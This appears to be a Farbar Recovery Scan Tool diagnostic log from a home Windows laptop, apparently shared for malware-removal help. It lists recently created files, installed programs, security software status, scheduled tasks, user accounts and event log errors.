2014-11-10 10:23 - 2014-11-10 10:16 - 05194752 _____ (AVAST Software) C:\Users\Mom\Desktop\aswMBR.exe
2014-11-10 10:23 - 2014-11-10 10:15 - 02140160 _____ () C:\Users\Mom\Desktop\adwcleaner_4.101.exe
2014-11-09 22:00 - 2014-11-11 07:26 - 00000000 ____D () C:\FRST
2014-11-09 21:58 - 2014-11-09 21:58 - 01107968 _____ (Farbar) C:\Users\Mom\Desktop\FRST.exe
2014-11-09 21:39 - 2014-11-09 21:39 - 00055008 _____ () C:\Users\Mom\Desktop\Extras.Txt
2014-11-09 21:36 - 2014-11-09 21:36 - 00228462 _____ () C:\Users\Mom\Desktop\OTL.Txt
2014-11-09 21:22 - 2014-11-09 21:23 - 00602112 _____ (OldTimer Tools) C:\Users\Mom\Desktop\OTL.exe
2014-11-09 16:52 - 2014-11-09 16:52 - 00001129 _____ () C:\Users\Public\Desktop\Kaspersky Internet Security.lnk
2014-11-09 16:52 - 2014-11-09 16:52 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Kaspersky Internet Security
2014-11-09 16:50 - 2014-11-10 20:17 - 00000000 ____D () C:\ProgramData\Kaspersky Lab
2014-11-09 16:50 - 2014-11-09 17:08 - 00644808 _____ (Kaspersky Lab ZAO) C:\windows\system32\Drivers\klif.sys
2014-11-09 16:50 - 2014-11-09 17:08 - 00112136 _____ (Kaspersky Lab ZAO) C:\windows\system32\Drivers\klflt.sys
2014-11-09 16:50 - 2014-11-09 16:50 - 00000000 ____D () C:\windows\ELAMBKUP
2014-11-09 16:50 - 2014-11-09 16:50 - 00000000 ____D () C:\Program Files\Kaspersky Lab
2014-11-09 16:50 - 2014-04-10 17:25 - 00034400 _____ (Kaspersky Lab ZAO) C:\windows\system32\Drivers\klhk.sys
2014-11-09 16:44 - 2014-11-09 16:44 - 00364640 _____ (Kaspersky Lab) C:\Users\Mom\Downloads\kss12.0.1.808_6398_6399.exe
2014-11-09 08:49 - 2014-11-09 08:49 - 00000000 __RSH () C:\MSDOS.SYS
2014-11-09 08:49 - 2014-11-09 08:49 - 00000000 __RSH () C:\IO.SYS
2014-11-09 07:57 - 2014-11-09 11:28 - 00114904 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\MBAMSwissArmy.sys
2014-11-09 07:57 - 2014-11-09 07:57 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-11-09 07:56 - 2014-11-09 07:57 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-11-09 07:56 - 2014-11-09 07:56 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-11-09 07:56 - 2014-10-01 11:11 - 00075480 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbamchameleon.sys
2014-11-09 07:56 - 2014-10-01 11:11 - 00051928 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mwac.sys
2014-11-09 07:56 - 2014-10-01 11:11 - 00023256 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbam.sys
2014-11-08 23:51 - 2014-11-08 23:51 - 00000000 ____D () C:\Users\Mom\AppData\Roaming\LavasoftStatistics
2014-11-08 15:15 - 2014-11-08 15:15 - 00000000 ____D () C:\Program Files\Enigma Software Group
2014-11-08 14:57 - 2014-11-10 14:53 - 00000560 _____ () C:\windows\setupact.log
2014-11-08 14:57 - 2014-11-08 14:57 - 00000000 _____ () C:\windows\setuperr.log
2014-11-08 14:56 - 2014-11-10 14:37 - 00011742 _____ () C:\windows\PFRO.log
2014-11-08 07:50 - 2014-11-08 07:56 - 00082656 _____ () C:\Users\Mom\Documents\cc_20141108_074954.reg
2014-11-08 07:02 - 2014-11-08 07:02 - 00000042 _____ () C:\Users\Mom\AppData\Roaming\WB.CFG
2014-11-07 20:51 - 2014-11-07 20:51 - 00019908 _____ () C:\Users\Mom\Documents\Namibia carnivore analysis and charts.xlsx
2014-11-07 18:57 - 2014-11-10 15:33 - 00000000 ____D () C:\Program Files\Mozilla Firefox
2014-11-01 13:09 - 2014-11-01 13:09 - 01054912 _____ (Adobe) C:\Users\Mom\Downloads\install_flashplayer15x32au_mssd_aaa_aih(1).exe
2014-10-22 17:37 - 2014-10-22 17:37 - 00031820 _____ () C:\Users\Mom\Documents\Survey_data_sheet_-_9.20.12.xlsx
2014-10-22 17:32 - 2014-10-22 17:32 - 00018696 _____ () C:\Users\Mom\Documents\Post_survey Project WOLFF.xlsx
2014-10-20 15:21 - 2014-10-20 15:21 - 01054912 _____ (Adobe) C:\Users\Mom\Downloads\install_flashplayer15x32au_mssd_aaa_aih.exe
2014-10-14 16:19 - 2014-10-09 17:39 - 00394752 _____ (Microsoft Corporation) C:\windows\system32\aepdu.dll
2014-10-14 16:19 - 2014-10-09 17:39 - 00230912 _____ (Microsoft Corporation) C:\windows\system32\generaltel.dll
2014-10-14 16:19 - 2014-10-09 17:34 - 00303104 _____ (Microsoft Corporation) C:\windows\system32\aeinv.dll
2014-10-14 16:19 - 2014-09-14 16:42 - 02377216 _____ (Microsoft Corporation) C:\windows\system32\win32k.sys

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-11 07:28 - 2010-12-25 22:17 - 00000886 _____ () C:\windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-11-11 07:24 - 2010-07-07 22:04 - 01071486 _____ () C:\windows\WindowsUpdate.log
2014-11-11 07:21 - 2012-04-14 18:28 - 00000830 _____ () C:\windows\Tasks\Adobe Flash Player Updater.job
2014-11-10 20:28 - 2010-12-25 22:17 - 00000882 _____ () C:\windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-11-10 15:01 - 2009-07-13 20:34 - 00016304 ____H () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-11-10 15:01 - 2009-07-13 20:34 - 00016304 ____H () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-11-10 14:54 - 2013-10-21 15:03 - 00000476 _____ () C:\windows\Tasks\SDMsgUpdate (Local).job
2014-11-10 14:54 - 2013-10-21 15:03 - 00000468 _____ () C:\windows\Tasks\SDMsgUpdate (TE).job
2014-11-10 14:54 - 2009-07-13 20:53 - 00000006 ____H () C:\windows\Tasks\SA.DAT
2014-11-10 10:26 - 2009-08-27 20:12 - 00726316 _____ () C:\windows\system32\PerfStringBackup.INI
2014-11-09 20:27 - 2013-01-10 21:49 - 00000000 ____D () C:\Users\Mom\Documents\OneNote Notebooks
2014-11-08 12:41 - 2009-07-13 18:04 - 00000505 _____ () C:\windows\win.ini
2014-11-08 07:48 - 2011-01-25 21:41 - 00000000 ____D () C:\windows\Minidump
2014-11-07 21:28 - 2013-03-05 22:29 - 00000000 ____D () C:\Program Files\Mozilla Maintenance Service
2014-11-07 20:15 - 2012-09-16 15:16 - 00002100 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-11-07 20:15 - 2011-05-19 17:34 - 00001071 _____ () C:\Users\Public\Desktop\Mozilla Firefox.lnk
2014-11-01 13:10 - 2011-01-07 22:32 - 00000000 ____D () C:\Users\Mom\AppData\Local\Adobe
2014-10-30 03:24 - 2010-12-26 20:28 - 00229000 ____N (Microsoft Corporation) C:\windows\system32\MpSigStub.exe
2014-10-20 15:19 - 2009-07-13 20:33 - 00368992 _____ () C:\windows\system32\FNTCACHE.DAT
2014-10-20 15:17 - 2014-07-10 18:23 - 00000000 ___SD () C:\windows\system32\CompatTel
2014-10-20 15:01 - 2010-07-07 22:10 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-10-20 14:12 - 2013-07-27 11:48 - 00000000 ____D () C:\windows\system32\MRT
2014-10-20 05:55 - 2011-03-26 20:21 - 100290944 _____ (Microsoft Corporation) C:\windows\system32\MRT.exe

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\windows\explorer.exe => File is digitally signed
C:\windows\system32\winlogon.exe => File is digitally signed
C:\windows\system32\wininit.exe => File is digitally signed
C:\windows\system32\svchost.exe => File is digitally signed
C:\windows\system32\services.exe => File is digitally signed
C:\windows\system32\User32.dll => File is digitally signed
C:\windows\system32\userinit.exe => File is digitally signed
C:\windows\system32\rpcss.dll => File is digitally signed
C:\windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2014-11-08 22:18

==================== End Of Log ============================

 

 

Additional scan result of Farbar Recovery Scan Tool (x86) Version: 09-11-2014 01
Ran by Mom at 2014-11-11 07:33:28
Running from C:\Users\Mom\Desktop
Boot Mode: Normal
==========================================================


==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Microsoft Security Essentials (Disabled - Up to date) {4F35CFC4-45A3-FC37-EF17-759A02E39AB1}
AV: Kaspersky Internet Security (Enabled - Up to date) {179979E8-273D-D14E-0543-2861940E4886}
AS: Microsoft Security Essentials (Disabled - Up to date) {F4542E20-6399-F3B9-D5A7-4EE87964D00C}
AS: Kaspersky Internet Security (Enabled - Up to date) {ACF8980C-0107-DEC0-3FF3-1313EF89023B}
FW: Kaspersky Internet Security (Enabled) {2FA2F8CD-6D52-D016-2E1C-81546ADD0FFD}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Flash Player 15 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Flash Player 15 Plugin (HKLM\...\Adobe Flash Player Plugin) (Version: 15.0.0.152 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.09) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.09 - Adobe Systems Incorporated)
Adobe Shockwave Player 11.6 (HKLM\...\Adobe Shockwave Player) (Version: 11.6.6.636 - Adobe Systems, Inc.)
ATI Catalyst Install Manager (HKLM\...\{B4BB4CF2-F475-FB20-7AFA-F8AED032BFF8}) (Version: 3.0.732.0 - ATI Technologies, Inc.)
ccc-core-static (Version: 2009.0729.2238.38827 - ATI) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 3.27 - Piriform)
Compatibility Pack for the 2007 Office system (HKLM\...\{90120000-0020-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
D3DX10 (Version: 15.4.2368.0902 - Microsoft) Hidden
Google Chrome (HKLM\...\Google Chrome) (Version: 38.0.2125.111 - Google Inc.)
Google Toolbar for Internet Explorer (HKLM\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.5111.1712 - Google Inc.)
Google Toolbar for Internet Explorer (Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (Version: 1.3.25.5 - Google Inc.) Hidden
Java™ 6 Update 14 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F83216014FF}) (Version: 6.0.140 - Sun Microsystems, Inc.)
Junk Mail filter update (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Kaspersky Internet Security (HKLM\...\InstallWIX_{653C1B5A-3287-47B1-8613-0745D4E771C4}) (Version: 15.0.0.463 - Kaspersky Lab)
Kaspersky Internet Security (Version: 15.0.0.463 - Kaspersky Lab) Hidden
Label@Once 1.0 (HKLM\...\{0D795777-9D60-4692-8386-F2B3F2B5E5BF}) (Version: 1.0 - Corel)
Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)
Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Home and Student 2010 (HKLM\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Office PowerPoint Viewer 2007 (English) (HKLM\...\{95120000-00AF-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Suite Activation Assistant (HKLM\...\{E50AE784-FABE-46DA-A1F8-7B6B56DCB22E}) (Version: 2.9 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.6.305.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Works (HKLM\...\{15BC8CD0-A65B-47D0-A2DD-90A824590FA8}) (Version: 9.7.0621 - Microsoft Corporation)
Mozilla Firefox 33.0.3 (x86 en-US) (HKLM\...\Mozilla Firefox 33.0.3 (x86 en-US)) (Version: 33.0.3 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 29.0.1 - Mozilla)
MSVCRT (Version: 15.4.2862.0708 - Microsoft) Hidden
MyToshiba (HKLM\...\{01250B8F-D947-4F8A-9408-FE8E3EE2EC92}) (Version: 2.2.0.3 - Toshiba)
NetZero Launcher (HKLM\...\{9AEAF9CC-390B-49C0-8F7F-14092BF163B6}) (Version: 2.01 - TOSHIBA Corporation)
Plants vs. Zombies™ (HKLM\...\am-plantsvszombiestm) (Version:  - )
PlayReady PC Runtime x86 (HKLM\...\{CCA5EAAD-92F4-4B7A-B5EE-14294C66AB61}) (Version: 1.3.0 - Microsoft Corporation)
Quickbooks Financial Center (HKLM\...\{3B843B38-04B1-4CE6-8888-586273E0F289}) (Version: 2.02 - TOSHIBA Corporation)
Realtek 8136 8168 8169 Ethernet Driver (HKLM\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 1.00.0005 - Realtek)
Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5904 - Realtek Semiconductor Corp.)
Realtek USB 2.0 Card Reader (HKLM\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.7600.30101 - Realtek Semiconductor Corp.)
Realtek WLAN Driver (HKLM\...\{0FB630AB-7BD8-40AE-B223-60397D57C3C9}) (Version: 2.00.0006 - Realtek)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version:  - Microsoft)
Skype Launcher (HKLM\...\{DA84ECBF-4B79-47F2-B34C-95C38484C058}) (Version: 2.01 - TOSHIBA Corporation)
Spotify (HKLM\...\Spotify) (Version: 0.5.2 - )
swMSM (Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 13.2.6.1 - Synaptics Incorporated)
Toshiba Application and Driver Installer (HKLM\...\{970472D0-F5F9-4158-A6E3-1AE49EFEF2D3}) (Version: 9.0.0.9 - Toshiba)
TOSHIBA Assist (HKLM\...\{12B3A009-A080-4619-9A2A-C6DB151D8D67}) (Version: 2.01.11 - TOSHIBA)
TOSHIBA ConfigFree (HKLM\...\{F3529665-D75E-4D6D-98F0-745C78C68E9B}) (Version: 8.0.21 - TOSHIBA Corporation)
TOSHIBA Disc Creator (HKLM\...\{5DA0E02F-970B-424B-BF41-513A5018E4C0}) (Version: 2.1.0.1 - TOSHIBA Corporation)
TOSHIBA Extended Tiles for Windows Mobility Center (HKLM\...\InstallShield_{617C36FD-0CBE-4600-84B2-441CEB12FADF}) (Version: 1.01.00 - TOSHIBA Corporation)
TOSHIBA Flash Cards Support Utility (HKLM\...\InstallShield_{620BBA5E-F848-4D56-8BDA-584E44584C5E}) (Version: 1.63.0.4C - TOSHIBA CORPORATION)
TOSHIBA Hardware Setup (HKLM\...\InstallShield_{5279374D-87FE-4879-9385-F17278EBB9D3}) (Version: 1.63.0.11C - TOSHIBA CORPORATION)
TOSHIBA HDD/SSD Alert (HKLM\...\InstallShield_{D4322448-B6AF-4316-B859-D8A0E84DCB38}) (Version: 3.1.0.2 - TOSHIBA Corporation)
Toshiba Online Backup (HKLM\...\{C57BCDE1-7CB9-467D-B3BA-7E119916CDC1}) (Version: 1.2.0.35 - Toshiba)
Toshiba Quality Application (HKLM\...\{E69992ED-A7F6-406C-9280-1C156417BC49}) (Version: 1.001.0000 - Toshiba)
TOSHIBA Recovery Media Creator (HKLM\...\{B65BBB06-1F8E-48F5-8A54-B024A9E15FDF}) (Version: 2.1.0.2 - TOSHIBA Corporation)
TOSHIBA Service Station (HKLM\...\{AC6569FA-6919-442A-8552-073BE69E247A}) (Version: 2.2.9 - TOSHIBA)
TOSHIBA Speech System Applications (HKLM\...\{EE033C1F-443E-41EC-A0E2-559B539A4E4D}) (Version: 1.00.2518 - )
TOSHIBA Speech System SR Engine(U.S.) Version1.0 (HKLM\...\{008D69EB-70FF-46AB-9C75-924620DF191A}) (Version:  - )
TOSHIBA Speech System TTS Engine(U.S.) Version1.0 (HKLM\...\{3FBF6F99-8EC6-41B4-8527-0A32241B5496}) (Version:  - )
TOSHIBA Supervisor Password (HKLM\...\InstallShield_{51B4E156-14A5-4904-9AE4-B1AA2A0E46BE}) (Version: 1.63.0.6C - TOSHIBA CORPORATION)
TOSHIBA Value Added Package (HKLM\...\InstallShield_{FEDD27A0-B306-45EF-BF58-B527406B42C8}) (Version: 1.2.25 - TOSHIBA Corporation)
ToshibaRegistration (HKLM\...\{5AF550B4-BB67-4E7E-82F1-2C4300279050}) (Version: 1.0.3 - Toshiba)
Update Installer for WildTangent Games App (Version:  - WildTangent) Hidden
Utility Common Driver (Version: 1.0.50.26C - TOSHIBA) Hidden
WildTangent Games (HKLM\...\WildTangent toshiba Master Uninstall) (Version: 1.0.0.71 - WildTangent)
WildTangent Games App (HKLM\...\{70B446D1-E03B-4ab0-9B3C-0832142C9AA8}.WildTangent Games App-wildgames) (Version: 4.0.11.14 - WildTangent)
WildTangent Games App (Toshiba Games) (HKLM\...\{70B446D1-E03B-4ab0-9B3C-0832142C9AA8}.WildTangent Games App-toshiba) (Version: 4.0.11.9 - WildTangent)
Windows Live Essentials (HKLM\...\WinLiveSuite) (Version: 15.4.3502.0922 - Microsoft Corporation)
Windows Live Sync (HKLM\...\{84EBDF39-4B33-49D7-A0BD-EB6E2C4E81C1}) (Version: 14.0.8089.726 - Microsoft Corporation)

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)


==================== Restore Points  =========================

10-11-2014 22:47:09 OTL Restore Point - 11/10/2014 2:47:08 PM
11-11-2014 15:21:59 Windows Update

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 18:04 - 2009-06-10 13:39 - 00000824 ____N C:\windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {379E6247-ABF6-4960-8690-CBA1DB7DD1B6} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2013-01-23] (Piriform Ltd)
Task: {65C917D5-DC49-47E6-A51D-CD13445D1552} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [2014-10-20] (Google Inc.)
Task: {674B1210-203E-40E8-B48F-42EC3728E782} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [2014-10-20] (Google Inc.)
Task: {C6092960-9C99-46FC-8AD4-594E143BE4D3} - System32\Tasks\ConfigFree Startup Programs => C:\Program Files\TOSHIBA\ConfigFree\NDSTray.exe [2009-07-13] (TOSHIBA CORPORATION)
Task: {D184E540-B318-4EB8-A158-1AD8B2843C19} - System32\Tasks\Adobe Flash Player Updater => C:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-24] (Adobe Systems Incorporated)
Task: {D5F9FB07-8D20-4390-BB04-886B79263728} - System32\Tasks\SDMsgUpdate (TE) => C:\Program Files\SmartDraw CI\Messages\SDNotify.exe [2012-08-13] ()
Task: {E8A9BC26-20A1-4785-9287-B6CBA4F061B2} - System32\Tasks\SDMsgUpdate (Local) => C:\Program Files\SmartDraw CI\Messages\SDNotify.exe [2012-08-13] ()

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\windows\Tasks\Adobe Flash Player Updater.job => C:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\windows\Tasks\SDMsgUpdate (Local).job => C:\PROGRA~1\SMARTD~1\Messages\SDNotify.exe
Task: C:\windows\Tasks\SDMsgUpdate (TE).job => C:\PROGRA~1\SMARTD~1\Messages\SDNotify.exe

==================== Loaded Modules (whitelisted) =============

2014-03-06 15:00 - 2014-03-06 15:00 - 01269952 _____ () C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\kpcengine.2.3.dll
2009-07-16 14:27 - 2009-07-16 14:27 - 07263544 _____ () C:\Program Files\TOSHIBA\FlashCards\BlackPng.dll
2009-07-16 14:27 - 2009-07-16 14:27 - 00052536 _____ () C:\Program Files\TOSHIBA\FlashCards\Hotkey\FnZ.dll
2009-08-27 20:05 - 2009-06-22 14:38 - 00015160 _____ () C:\Program Files\TOSHIBA\TOSHIBA Assist\NotifyX.dll
2009-03-12 18:08 - 2009-03-12 18:08 - 00049152 _____ () C:\Program Files\Toshiba\PCDiag\NotifyPCD.dll
2009-07-25 10:07 - 2009-07-25 10:07 - 00058704 _____ () C:\Program Files\TOSHIBA\TOSHIBA Disc Creator\NotifyTDC.dll
2009-05-04 09:45 - 2009-05-04 09:45 - 00016384 ____R () C:\Program Files\ATI Technologies\ATI.ACE\Branding\Branding.dll
2010-07-07 22:26 - 2010-07-07 22:26 - 00270336 _____ () C:\windows\assembly\GAC_MSIL\CLI.Aspect.CrossDisplay.Graphics.Dashboard\1.0.0.0__90ba9c70f846762e\CLI.Aspect.CrossDisplay.Graphics.Dashboard.dll
2009-09-17 14:36 - 2009-09-17 14:36 - 00079192 _____ () C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosIPCWraper.dll
2014-11-07 18:57 - 2014-11-07 18:57 - 03649648 _____ () C:\Program Files\Mozilla Firefox\mozjs.dll
2014-04-20 01:42 - 2014-04-20 01:42 - 00468672 _____ () C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\FFExt\[email protected]\npcontentblocker.dll
2014-04-20 01:42 - 2014-11-09 16:59 - 00642344 _____ () C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\FFExt\[email protected]\npvkplugin.dll
2014-04-20 01:42 - 2014-04-20 01:42 - 00347328 _____ () C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\FFExt\[email protected]\nponlinebanking.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)


==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)


==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)


========================= Accounts: ==========================

Administrator (S-1-5-21-2731384514-3676459448-2700856802-500 - Administrator - Disabled)
Guest (S-1-5-21-2731384514-3676459448-2700856802-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-2731384514-3676459448-2700856802-1004 - Limited - Enabled)
Mom (S-1-5-21-2731384514-3676459448-2700856802-1001 - Administrator - Enabled) => C:\Users\Mom

==================== Faulty Device Manager Devices =============

Name: Teredo Tunneling Pseudo-Interface
Description: Microsoft Teredo Tunneling Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.


==================== Event log errors: =========================

Application errors:
==================
Error: (11/10/2014 07:49:11 AM) (Source: VSS) (EventID: 12305) (User: )
Description: Volume Shadow Copy Service error: Volume/disk not connected or not found.
Error context: DeviceIoControl(\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4 - 000000F4,0x00560034,00C85060,0,00C84058,4096,[0]).


Operation:
   Processing PostFinalCommitSnapshots

Context:
   Execution Context: System Provider

Error: (11/07/2014 08:15:10 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: plugin-container.exe, version: 33.0.2.5413, time stamp: 0x544ef530
Faulting module name: mozalloc.dll, version: 33.0.2.5413, time stamp: 0x544ed089
Exception code: 0x80000003
Fault offset: 0x00001425
Faulting process id: 0x1270
Faulting application start time: 0xplugin-container.exe0
Faulting application path: plugin-container.exe1
Faulting module path: plugin-container.exe2
Report Id: plugin-container.exe3

Error: (09/16/2014 07:01:38 PM) (Source: Microsoft Office 14) (EventID: 2000) (User: )
Description: Microsoft Publisher: Accepted Safe Mode action : Publisher failed to start correctly last time.  Starting Publisher in safe mode will help you correct or isolate a startup problem in order to successfully start the program.  Some functionality may be disabled in this mode.

Do you want to start Publisher in safe mode?.
Accepted Safe Mode action : Microsoft Publisher.

Error: (09/16/2014 06:56:06 PM) (Source: Microsoft Office 14) (EventID: 2001) (User: )
Description: Microsoft Publisher: Rejected Safe Mode action : Publisher failed to launch in safe mode. Do you want to start repair?.
Rejected Safe Mode action : Microsoft Publisher.

Error: (09/16/2014 06:49:33 PM) (Source: Microsoft Office 14) (EventID: 2000) (User: )
Description: Microsoft Publisher: Accepted Safe Mode action : Publisher failed to start correctly last time.  Starting Publisher in safe mode will help you correct or isolate a startup problem in order to successfully start the program.  Some functionality may be disabled in this mode.

Do you want to start Publisher in safe mode?.
Accepted Safe Mode action : Microsoft Publisher.

Error: (07/08/2014 04:20:15 PM) (Source: System Restore) (EventID: 8193) (User: )
Description: Failed to create restore point (Process = C:\windows\system32\svchost.exe -k netsvcs; Description = Windows Update; Error = 0x81000101).

Error: (06/11/2014 05:38:40 PM) (Source: System Restore) (EventID: 8193) (User: )
Description: Failed to create restore point (Process = C:\windows\system32\svchost.exe -k netsvcs; Description = Windows Update; Error = 0x81000101).

Error: (06/02/2014 05:05:58 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: GoogleUpdate.exe, version: 1.2.183.9, time stamp: 0x4ad50798
Faulting module name: goopdate.dll_unloaded, version: 0.0.0.0, time stamp: 0x53604624
Exception code: 0xc0000005
Fault offset: 0x6241dab2
Faulting process id: 0x1610
Faulting application start time: 0xGoogleUpdate.exe0
Faulting application path: GoogleUpdate.exe1
Faulting module path: GoogleUpdate.exe2
Report Id: GoogleUpdate.exe3

Error: (05/23/2014 03:44:17 PM) (Source: System Restore) (EventID: 8193) (User: )
Description: Failed to create restore point (Process = C:\windows\system32\svchost.exe -k netsvcs; Description = Windows Update; Error = 0x81000101).

Error: (05/09/2014 05:05:09 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: firefox.exe, version: 28.0.0.5186, time stamp: 0x53240e37
Faulting module name: xul.dll, version: 28.0.0.5186, time stamp: 0x53240e04
Exception code: 0xc0000005
Fault offset: 0x00184729
Faulting process id: 0x990
Faulting application start time: 0xfirefox.exe0
Faulting application path: firefox.exe1
Faulting module path: firefox.exe2
Report Id: firefox.exe3


System errors:
=============
Error: (11/11/2014 07:24:42 AM) (Source: BROWSER) (EventID: 8032) (User: )
Description: The browser service has failed to retrieve the backup list too many times on transport \Device\NetBT_Tcpip_{A3724C8B-7757-40B3-A609-350AB764ABF0}.
The backup browser is stopping.

Error: (11/11/2014 07:21:37 AM) (Source: atikmdag) (EventID: 10261) (User: )
Description: Display is not active

Error: (11/10/2014 09:13:51 PM) (Source: atikmdag) (EventID: 10261) (User: )
Description: Display is not active

Error: (11/10/2014 08:03:40 PM) (Source: BROWSER) (EventID: 8032) (User: )
Description: The browser service has failed to retrieve the backup list too many times on transport \Device\NetBT_Tcpip_{A3724C8B-7757-40B3-A609-350AB764ABF0}.
The backup browser is stopping.

Error: (11/10/2014 08:00:24 PM) (Source: atikmdag) (EventID: 10261) (User: )
Description: Display is not active

Error: (11/10/2014 03:23:20 PM) (Source: atikmdag) (EventID: 10261) (User: )
Description: Display is not active

Error: (11/10/2014 03:04:39 PM) (Source: BROWSER) (EventID: 8032) (User: )
Description: The browser service has failed to retrieve the backup list too many times on transport \Device\NetBT_Tcpip_{A3724C8B-7757-40B3-A609-350AB764ABF0}.
The backup browser is stopping.

Error: (11/10/2014 03:01:36 PM) (Source: atikmdag) (EventID: 10261) (User: )
Description: Display is not active

Error: (11/10/2014 02:53:54 PM) (Source: atikmdag) (EventID: 10261) (User: )
